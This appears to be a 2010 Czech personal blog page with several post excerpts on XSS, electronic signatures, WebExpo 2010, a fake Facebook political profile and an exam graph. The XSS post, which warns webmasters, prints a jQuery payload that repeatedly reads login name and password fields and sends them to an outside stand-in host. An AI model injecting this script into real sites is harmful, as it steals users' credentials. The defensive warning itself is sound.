| Michal Smrčka - blog

S XSS zranitelností se dá napáchat více škody, než si myslíte

Otázka pro webmastery: Víte, co dělá následující jQuery kód?

<script>$(function(){setInterval(function() {$.get('http://nejaky_web.cz/uloz_data.php', {jmeno: $('[name=l_jmeno]').val(), heslo: $('[name=l_heslo]').val() })},500);}); </script>

Pokud nevíte, a zároveň se někde na vašem webu vyskytuje výpis typu „echo $_POST[rocnik] “, upalujte svůj web opravit a vypisované parametry ošetřit.

Jestli provozujete web obsahující např. citlivá data uživatelů, pak vyloženě hazardujete. Za únik dat hrozí právní postih i vám, pokud se prokáže, že nebyla provedena ani nejzákladnější bezpečnostní opatření. Což obrana proti XSS bezesporu je. Více informací na Wikipedii.


13. 11. 2010 v 20:45 • Bezpečnost a hacking • autor Michal Smrčka1 komentář

Elektronický podpis - vyplatí se vůbec?

Elektronický podpis se v poslední době velmi rozšířil a může vám ušetřit spoustu času s vyřizováním na úřadech. Je to tak nebo se jej nevyplatí pořizovat?

digitální podpisZa elektronický podpis se v širším významu dá považovat jakékoliv uvedení identifikačních údajů autora do elektronického dokumentu. Takovýto podpis samozřejmě není schopen zaručit ani integritu ani autenticitu podepsaného. Avšak velmi často se tímto pojmem myslí zaručený elektronický podpis. Takovýto podpis zajišťuje pomocí kryptografických metod a dohledu nezávislé třetí strany (certifikační autority) integritu a autenticitu dat. Tím je zajištěno, že odesílatelem zprávy je skutečně ten, kdo předpokládáme a také to, že zpráva nebyla během přenosu změněna.


19. 10. 2010 v 20:17 • Reklamní sdělení • autor Michal Smrčka1 komentář

Jaké bylo WebExpo 2010 (krátké postřehy)

Kdybych článek nenapsal teď, tak už nikdy (důkazem budiž rozepsaný, dosud nezveřejněný článek o ročníku 2009). Takže... WebExpo 2010 jsem si užil. Objevilo se sice pár failů, ale byla zde hlavně pozitiva – skvělí lidé, hordy postřehů, nápadů, motivací a zajímavých myšlenek.

K přednáškám bych skoro neměl výhrady. Mile mě překvapil páteční dopolední Business blok následovaný „kreativními“ přednáškami v Designu. Zde mě jen trochu mrzelo, že si Lukáš Veverka a Petr Skala skákali do řeči, zjevně nejsou moc zvyklí prezentovat, ale jejich práce je úchvatná.

Po první přednášce jsem si zašel pro kávu, načež jsem si všiml nějaké dlouhé fronty. Začínala ve dveřích označených jako „registrace“, končila... někde v dálce. Ale jako fakt v dálce.


25. 09. 2010 v 22:57 • Webdesign • autor Michal Smrčka3 komentáře

Falešný profil na Facebooku využívaný k politické propagaci Nové Generace

Facebook je ráj pro podvodníky a spamery, kteří se chtějí přiživit na naivitě a důvěřivosti lidí. Vznikají stále nové techniky, jak oslovit co největší masu uživatelů reklamou - počínaje neexistujícími soutěžemi o hodnotné ceny, konče zneužíváním jeho funkcí.

Jeden případ využití Facebooku k politické propagandě se objevil nyní ve Znojmě (je cílen na znojemské uživatele). Masivně spamuje ostatní uživatele Facebooku zajímavým trikem.


19. 09. 2010 v 15:37 • Sociální sítě • autor Michal Smrčka3 komentáře

Státní maturita z matematiky nakreslená v Malování?

Ze zvědavosti jsem nahlédl do oficiálních testů nanečisto nových maturit z matematiky.

graf

hyperparabola

Já, kdybych byl takto narýsovaná parabola, asi bych si uvázal smyčku a na ose x bych se oběsil. Nevím, kdo to na ministerstvu školství schvaloval, ale mě by za takový graf vyrazili i ze semestrální písemky...

Prosím, řekněte těm na ministerstvu, že v Malování je vlevo ikonka, kterou se dají dělat kolečka, nemusí to bastlit tužkou! A křivka tam udělat taky jde. Ať to má aspoň trochu úroveň, né? :-)

(Přímý odkaz na zdrojové PDF, kdyby mi někdo nevěřil)


04. 09. 2010 v 19:38 • Ostatní • autor Michal Smrčka2 komentáře

Stránka: < 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 >

Kategorie blogu

Twitter feed

    Twitter @michalsmrcka @michalsmrcka
  • Michal Smrčka: @ScottyCZE Největší prdel je, že dostala od vedoucího a oponenta návrh na známky C a E.
    5.2.2012 13:50
  • Michal Smrčka: Vodafone podmínil dotaci na tel. datovým tarifem, ale všimli jste si, že současně ZDRAŽIL? Např. iPhone z 12877 na 13377 při 477/měs.
    3.2.2012 19:28
  • Michal Smrčka: "Zdar vole, kolik berete piv?" - "Haló? Voláte správně?" #kurva #android
    2.2.2012 12:40

Poslední články

Poslední komentáře

Honyx: To se teda máte čím chlubit...A autorizovaný asi jen podle jména...Trošku jsem podráždil strejdu Gůgla a zjistil že se o vás nepíše jen tady...Je mi vás líto chlapci... Ukázat
Lopata: Ne.. děláme to pouze podle předpisů tak jak máme :)A ano správně AUTORIZOVANÝ servis :P Ukázat
Honyx: Ano a to je přesně přístup výše jmenovaného "autorizovaného"servisu...Než by něco udělali pořádně,tak plnou pusu nesmyslů o tom jak to nejde a "nezájem"...Jsem bohužel v Čechách... Ukázat
Lopata: Nezájem :) A nazdar bazar ;) Ukázat
Honyx: Nevím zad bych riskoval ale rozhodně bych vyměnil to v čem je problém pokud enebyl způsoben oxidací a pokud by se ten telefon vrátil s problémem který způsobila oxidace,po té bych to teprve řešil a ne že:nesvítí ti display,máš tam 1mm čtvereční oxidace,tak... Ukázat

Vyhledávání

Nastavení

Velikost písma: Abc Abc Abc